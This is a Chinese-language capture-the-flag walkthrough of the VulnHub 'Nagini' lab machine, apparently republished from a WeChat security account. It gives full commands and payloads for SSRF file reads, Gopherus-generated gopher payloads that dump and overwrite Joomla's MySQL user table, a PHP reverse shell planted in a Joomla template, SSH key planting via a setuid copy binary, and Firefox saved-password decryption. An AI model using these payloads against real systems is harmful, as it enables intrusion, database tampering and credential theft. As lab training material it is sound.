声明
该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
靶机地址:
https://download.vulnhub.com/harrypotter/Nagini.ova
内容简介:
在这次打靶过程中,将使用到以下攻击手段:
主机发现 端口扫描
WEB信息收集 HTTP3协议
域名绑定
SSRF漏洞(Gopher + Mysql)
Joomla漏洞 SSH公钥登录
浏览器密码还原
1.1 主机发现
arp-scan -l
1.2 端口扫描
nmap -p- 192.168.144.130
nmap -p22,80 -sV -sC 192.168.144.130Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-03 22:38 EDTNmap scan report for 192.168.144.130Host is up (0.00071s latency).PORT STATE SERVICE VERSIONopen ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)ssh-hostkey:2048 48:df:48:37:25:94:c4:74:6b:2c:62:73:bf:b4:9f:a9 (RSA)256 1e:34:18:17:5e:17:95:8f:70:2f:80:a6:d5:b4:17:3e (ECDSA)256 3e:79:5f:55:55:3b:12:75:96:b4:3e:e3:83:7a:54:94 (ED25519)open http Apache httpd 2.4.38 ((Debian)): Site doesn't have a title (text/html).: Apache/2.4.38 (Debian)MAC Address: 08:00:27:AA:7E:BB (Oracle VirtualBox virtual NIC)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 13.50 second
1.3 WEB信息收集
对该网址进行
http://192.168.144.130/
路径爬取
dirsearch -u http://192.168.144.130
发现joomla cms框架
http://192.168.144.130/joomla/
http://192.168.144.130/joomla/administrator/
后台管理页面
再次深度爬取
dirsearch -u http://192.168.144.130 -f -e html,php,txt -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
1.4 HTTP3协议
访问
http://192.168.144.130/note.txt
通过阅读可知 quic.nagini.hogwarts 绑定域名 192.168.144.130 quic.nagini.hogwarts
并且需要通过http3协议来加载此网站!!!!!!http3详解 https://zhuanlan.zhihu.com/p/143464334
下载安装支持http3协议的软件quiche
//安装过程漫长git clone --recursive https://github.com/cloudflare/quichecd /home/kali/quichesudo apt install cargosudo apt install cmakecargo build --examples //会报错 并且非常慢 还需要换源 具体命令参考 https://blog.csdn.net/u010953692/article/details/106464851sudo apt purge rustcexport RUSTUP_DIST_SERVER=https://mirrors.ustc.edu.cn/rust-staticexport RUSTUP_UPDATE_ROOT=https://mirrors.ustc.edu.cn/rust-static/rustupcurl -proto '=https'--tlsv1.2 -sSf https://sh.rustup.rs | sh //选择 1source "$HOME/.cargo/env"cargo build --examples // 再次执行 成功了cargo test // okcd target/debug/examples
安装成功了就可以使用了!
./http3-client https://quic.nagini.hogwarts
阅读上面的话1.得到这样的网址 http://192.168.144.130/internalResourceFeTcher.php2.存在.bak文件通过百度搜索大法得到joomla/configuration.php.bak
1.5 SSRF漏洞(Gopher + Mysql)
file:///etc/passwd //文件读取器http://192.168.144.130/internalResourceFeTcher.php?url=file%3A%2F%2F%2Fetc%2Fpasswd
利用gopher协议尝试gopher:///127.0.0.1:22//可以探测 端口
访问
http://192.168.144.130/joomla/configuration.php.bak
存在备份文件
public $dbtype = 'mysqli';public $host = 'localhost';public $user = 'goblin';public $password = '';public $db = 'joomla';public $dbprefix = 'joomla_';public $live_site = '';public $secret = 'ILhwP6HTYKcN7qMh';public $fromname = 'Joomla CMS';public $sendmail = '/usr/sbin/sendmail';public $smtphost = 'localhost';public $smtpsecure = 'none';public $smtpport = '25';public $log_path = '/var/www/html/joomla/administrator/logs';public $tmp_path = '/var/www/html/joomla/tmp';public $lifetime = '15';public $session_handler = 'database';public $shared_session = '0';
gopher://127.0.0.1:3306http://192.168.144.130/internalResourceFeTcher.php?url=gopher%3A%2F%2F127.0.0.1%3A3306
在靶机内部开启了 3306端口
git clone https://github.com/tarunkant/Gopherus.git //使用这个工具执行 ssrf+gopher 攻击python2 ./gopherus.py --exploit mysql // 需要填写数据库用户名 以及 使用命令use joomla; show tables ;以下生成成功 payloadgopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%67%6f%62%6c%69%6e%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%1a%00%00%00%03%75%73%65%20%6a%6f%6f%6d%6c%61%3b%20%73%68%6f%77%20%74%61%62%6c%65%73%20%3b%01%00%00%00%01
找到了 joomla_users这个表
use joomla; select * from joomla_users; //查用户信息gopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%67%6f%62%6c%69%6e%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%28%00%00%00%03%75%73%65%20%6a%6f%6f%6d%6c%61%3b%20%73%65%6c%65%63%74%20%2a%20%66%72%6f%6d%20%6a%6f%6f%6d%6c%61%5f%75%73%65%72%73%3b%01%00%00%00%01
查到用户名 site_admin查到密码 $2y$10$cmQ.akn2au104AhR4.YJBOC5W13gyV21D/bkoTmbWWqFWjzEW7vay这个密码太复杂了,于是通过sql语句直接改写site_admin的密码echo -n "abc" | md5sum //得到md5 900150983cd24fb0d6963f7d28e17f72use joomla;update joomla_users SET password='900150983cd24fb0d6963f7d28e17f72'WHERE username='site_admin'; //更新 site_admin 密码 为 abcgopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%67%6f%62%6c%69%6e%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%4f%00%00%00%03%75%73%65%20%6a%6f%6f%6d%6c%61%3b%75%70%64%61%74%65%20%6a%6f%6f%6d%6c%61%5f%75%73%65%72%73%20%53%45%54%20%70%61%73%73%77%6f%72%64%3d%27%39%30%30%31%35%30%39%38%33%63%64%32%34%66%62%30%64%36%39%36%33%66%37%64%32%38%65%31%37%66%37%32%27%01%00%00%00%01
1.6 Joomla漏洞
访问
http://192.168.144.130/joomla/administrator/index.php
账号 site_admin 密码 abc
登陆成功!!
找到模板
找到error.php页面直接修改源码
cp /usr/share/webshells/php/php-reverse-shell.php .修改该php文件里面的ip和端口
把该文件内容粘贴到 error.php 文件
保存然后退出
在 kali上监听4444端口
直接访问该目标地址
http://192.168.144.130/joomla/templates/protostar/error.php
突破边界成功!拿到权限
发现了base64编码的文字
/bin/bash -i //升级终端cd /home/snapels -laecho "TG92ZUBsaWxseQ==" | base64 -d //得到 Love@lillyssh snape@192.168.144.130 // 密码 Love@lilly
登录成功!
1.7 SSH公钥登录
cd /home/hermoine/binls -la./su_cp --help //拷贝命令
发现这个su_cp程序并且它具有s权限
思路: kali生成公钥对 ,拷贝到目标靶机 ,利用su_cp 命令 ,将kali的公钥拷贝到hermoine 的 .ssh 目录下,然后成功登录。ssh-keygencd /root/.sshlsscp id_rsa.pub [email protected]:~/ // 密码 Love@lillycd /home/snapemv id_rsa.pub authorized_keyscd /home/hermoine/bin-p /home/snape/authorized_keys /home/hermoine/.ssh/ssh [email protected] // 直接登录
成功登录hermoine账户
1.8 提权(浏览器密码还原)
发现目录下存在浏览器目录!
需要借助工具去分析,所以先要把 mozilla文件拷贝到 kali上
scp -rp hermoine@192.168.144.130:/home/hermoine/.mozilla /tmp下载工具放到kali上https://github.com/unode/firefox_decryptpython3 firefox_decrypt.py /tmp/.mozilla/firefoxWebsite: http://nagini.hogwartsUsername: 'root'Password: '@Alohomora#123'
找到账户密码
成功
注:如有侵权请后台联系进行删除
觉得内容不错,请点一下"赞"和"在看"
原文始发于微信公众号(嗨嗨安全):靶机实战系列之Nagini靶机
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论